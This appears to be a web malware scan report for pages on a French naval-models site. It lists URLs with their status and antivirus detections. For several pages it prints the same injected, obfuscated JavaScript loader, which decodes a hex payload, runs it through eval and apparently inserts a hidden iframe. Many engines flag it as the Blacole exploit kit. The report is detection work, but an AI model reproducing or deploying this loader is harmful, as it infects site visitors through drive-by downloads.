Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/liensweb.htm | 200 OK Content-Length: 11980 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/maquettestarifs.htm | 200 OK Content-Length: 13731 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sfrj="spl"+"i"+"t";iyxhi=window;kgwel="0"+"x";kclzl=(5-3-1);try{--(document["body"])}catch(eexnn){mqwdy=false;try{}catch(sgmi){mqwdy=21;}if(1){ukb="17:5d:6c:65:5a:6b:60:66:65:17:60:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:60:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:60:5f
... 3397 bytes are skipped ...:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5f:27:30:1f:20:32:4:1:74:4:1:74"[sfrj](":");}iyxhi=ukb;ceg=[];for(cpsg=22-20-2;-cpsg+1387!=0;cpsg+=1){wju=cpsg;if((0x19==031))ceg+=String.fromCharCode(eval(kgwel+iyxhi[1*wju])+0xa-kclzl);}jighp=eval;jighp(ceg)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clod3a8.Trojan.41b5
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Agent.gyg
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://maquettes.navales.free.fr/avionmarinefr.jpg | 200 OK Content-Length: 30522 Content-Type: image/jpeg | clean |
http://maquettes.navales.free.fr/test404page.js | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |